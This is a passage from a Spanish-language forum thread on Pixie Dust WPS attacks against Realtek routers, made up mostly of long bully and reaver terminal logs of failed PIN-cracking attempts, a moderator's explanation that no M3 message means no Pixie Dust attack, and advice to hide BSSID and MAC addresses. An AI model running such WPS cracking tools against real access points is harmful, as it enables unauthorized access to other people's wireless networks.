[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts

Desconectado

#7 21-05-2016 20:13:56

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,051

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Debes usar la versión modificada por aanarchy para hacer un ataque pixiedust : Bully WPS: La alternativa a Reaver renace con soporte Pixiewps
De todo modo si no has podido comprobar ni una sola primeta mitad de PIN es que no puedes mandar un M4
Si no puedes mandar un M4 es que no has recibido a ningún momento un M3 y por lo tanto no vas a poder hacer un ataque pixie dust.
Mejor para tu anonimato borrar/editar el bSSID y eSSID de tu red y se ve también la mac de tu dispositivo wifi.
Edito tu mensaje wink
Ten cuidado la próxima vez wink (lo digo por ti)
PD : Veo que el primer post no esta completo (faltan los últimos avances) y tiene unas cuentas faltas (culpa a las prisas y a la emoción big_smile), lo retocaré.

Desconectado

#8 21-05-2016 21:12:16

sergio1985
Usuario

Registrado: 02-03-2016
Mensajes: 23

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Bueno gracias por tus recomendaciones voy a intentar de nuevo con la version modificada a ver si tengo  suerte
Bueno saludos aqui de nuevo molestando resultado ataque con bully tambien la e probado colocando en vez de v3 v4 tambien con el adaptador wifi que viene integrado en pc es una intel pero sin buenos resultados   

[email protected]:~# time sudo bully wlan1mon -b 00:13:33 -c 1 -d -v 3
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY([email protected])
[+] Switching interface 'wlan1mon' to channel '1'
[!] Using '01:0d:b1' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '00:13:33' on channel '1'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'Rocabado' (00:13:33)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/001333.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '00524858'
^C
Saved session to '/root/.bully/001333.run'

real	0m36.012s
user	0m0.080s
sys	0m0.340s

Desconectado

#9 23-05-2016 02:58:53

d1k0w0ns
VeryInsaneUsuario

Registrado: 12-06-2015
Mensajes: 197

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

sergio1985 escribió:

tambien la e probado colocando en vez de v3 v4 tambien con el adaptador wifi que viene integrado en pc es una intel pero sin buenos resultados

v3 y v4 es solo mas o menos informacion nada que ver con conseguir el pin, como si no lo quieres poner

Desconectado

#10 23-05-2016 08:10:56

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,051

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Es lo mismo.
Estas en bucle sobre tu primer PIN.
Si no consigues comprobar una primera mitad es que no has podido mandar un M4 porque no has recibido el M3.
La mitad de las cadenas necesarias para hacer un ataque pixie dust, cuál sea el chipset del punto de acceso,  están en el M3.
No M3 = no pixie dust.

Desconectado

#11 24-05-2016 07:01:58

sergio1985
Usuario

Registrado: 02-03-2016
Mensajes: 23

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Bueno mis pruebas para obtener pin wps con la mac 00:13:33 terminaron agradecido por sus recomendaciones y seguire leyendo a ver si aparece algo nuevo

Desconectado

#12 24-05-2016 23:33:40

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,051

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

De todo modo, repasando el hilo pixiewps en el foro kali linux, he visto que el RTL8671 es el chipset... que no esta soportado.

RTLalgoNosoportado.jpg

Na' de na' tongue
tongue


------------------------   edit ---------------------------------------

  @ Patcher ( y a [email protected] smile )

  Con lo que has encontrado sobre las livebox he deicidio crear un nuevo tema para que vayamos estudiando esto y ver si podemos dar con el algoritmo :
Algoritmo WPS livebox 2.1 y 3.1 (orange / arcadyan)
  Gracias otra vez, tengo un buen presentimiento, podrías haber dado en el clavo. biere

Desconectado

#13 30-06-2016 22:54:36

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,051

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Pongo a continuación el mensajes de Sergio que no estaba en el sitios adecuado :

sergio1985 escribió:

E que no puede ser yo que estaba feliz por haber obtenido M3 realizando la prueba con pixiewps 1.2modfificado  -e -r -s -z -a -n -v 3 me sale pin no fue a ver si alguien me lo revisa y me dice si falta  algo o no es vulnerable RTL 8671 mac 00:13:33

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

[+] Switching wlan1 to channel 6
[+] Waiting for beacon from 00:13:33:
[!] WARNING: Failed to associate with 00:13:33:
[+] Associated with 00:13:33:
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 00:00:54:7e:00:00:6a:5c:00:00:00:f6:00:00:71:ec
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: f2:5c:72:3f:6a:0c:a0:14:79:2d:c7:b3:a9:6d:68:44
[P] PKR: 97:27:1a:fa:d5:13:1b:70:3d:c1:44:9c:be:99:0c:66:96:11:0a:b5:8d:d6:41:1a:ee:60:1e:27:2c:c4:42:d8:f6:8b:12:81:12:40:03:ae:f3:1e:f6:34:25:08:9f:3b:8f:4a:d1:81:09:3f:b3:51:ee:ca:8c:a6:70:61:16:d9:3e:6c:11:55:56:e7:e3:d1:56:a0:4f:13:8c:ee:a6:70:5c:9e:7c:60:00:ec:72:d0:ec:eb:5e:6f:10:f5:6c:58:f2:94:8a:04:16:fb:09:70:e7:11:4a:47:52:bd:86:ac:44:02:8b:df:d0:b3:ed:df:fb:34:50:2a:06:cc:9a:2b:ff:6c:36:c2:cd:fc:7f:2d:4d:8d:6e:35:d5:97:35:dc:fb:0d:fa:b4:ef:8b:70:30:d9:bb:38:47:fd:b9:64:82:85:31:11:32:c2:52:78:ae:8f:99:37:2e:c9:1b:6d:00:97:d9:9f:44:cf:98:18:f8:6f:73:3a:c4:4c:f1:fc:cf
